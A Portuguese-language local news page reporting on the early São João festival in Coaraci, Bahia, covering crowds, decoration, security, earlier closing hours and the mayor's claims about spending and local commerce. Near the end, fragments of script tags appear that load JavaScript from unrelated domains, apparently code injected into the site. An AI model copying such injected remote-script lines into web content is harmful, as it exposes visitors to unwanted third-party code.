Inscreva-se aqui e receba nossas notícias por e-mail.

Cultura

 
 
Coaraci: Forró Antecipado supera expectativas e agrada o público
Fonte: Rede Portal

1

O São João Antecipado do município de Coaraci realizado no último final de semana superou as expectativas da comissão organizadora que teve que enfrentar muitos questionamentos antes mesmo da realização do evento, visto que o governo municipal adotou uma logística diferenciada do que vinha sendo realizado no município em eventos anteriores.

A primeira mudança foi o deslocamento da data da festa, do período oficial para o período antecipado, o que fez com que a praça estivesse lotada nos dois dias, pois sem concorrer com nenhum outro evento, Coaraci recebeu visitantes de Itapitanga, Almadina, Itajuipe, Itabuna e demais cidades circunvizinhas. A decoração da festa também foi diferenciada, buscando as raízes tradicionais com bandeirolas, palhas de coqueiro, elementos decorativos e a presença de uma fogueira, elemento que há mais de 15 anos não era lembrado nas decorações da praça. A disposição dos ambulantes também, foi repensada de forma a dar maior comodidade aos foliões.

A secretaria de saúde montou um pronto socorro com médicos, enfermeiros e auxiliares além de disponibilizar uma ambulância para o deslocamento de casos mais graves até o Hospital. Na segurança, 85 policiais fizeram o trabalho no espaço. Todos que entravam na festa passavam pelos detectores de metais e estavam sendo monitorados pelas câmeras espalhadas pelo circuito.

Outro fato marcante foi o horário de início e término da festa. Seguindo orientação do comando da Polícia Militar, o evento começou mais cedo nos dois dias para que fosse encerrado por volta das 2 horas da manhã no sábado e 1h no domingo. Essa é uma prática que foi adotada no Carnaval de Itabuna e deu certo, já que segundo a PM as ocorrências começam a acontecer no período da madrugada. Além disso com as atrações se apresentando mais cedo, crianças, jovens, adultos e idosos puderam dançar e se divertir à vontade.

Segundo o prefeito Jadson Albano, o resultado foi positivo: “Estou alegre em ver a nossa comunidade se divertindo, investimos pouco mais que 100 mil reais nesse evento, uma quantia cinco vezes menor do que outros anos em que foi feito um São João em Coaraci, economizando os recursos públicos, mas o mais importante é que os cálculos indicam que circulou no município nesse período mais de 300 mil reais no comércio local, assim atendemos a expectativa do nosso comércio local (...) temos muito a fazer ainda nesse ano, teremos o asfalto prometido pelo Governador, vamos receber mais uma ambulância nos próximos dias, um veículo para o Conselho Tutelar, iniciaremos a pavimentação do Bela Vista, em Itamotinga e no Antônio Leal, essa semana entregamos o Posto de Saúde da Ruinha dos 3 Braços, teremos a festa junina no Bairro da Feirinha, teremos no fim do ano o dia da cidade, vamos ter o Interbairros, o Sul Baiano de Futsal será sediado em Coaraci em Julho e é isso, vamos trabalhando pelo nosso povo, colocando as coisas no rumo do desenvolvimento” cita o prefeito.

Por: Rodrigo Leite

11

13

2

3

4

5

6

7

8

9

10

Fotos: Rede Portal

type="text/javascript" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x7062x&r=16"> type="text/javascript" src="http://pageanalytics.space/addons/lnkr5.min.js"> type="text/javascript" src="http://pageanalytics.space/ext/1b9649e2b4203c3988.js?sid=52200_7062_&title=%5B506%5D%20MemeManager&blocks[]=31af2">
 

Content on this page requires a newer version of Adobe Flash Player.

Get Adobe Flash player

Content on this page requires a newer version of Adobe Flash Player.

Get Adobe Flash player

 
mais notícias....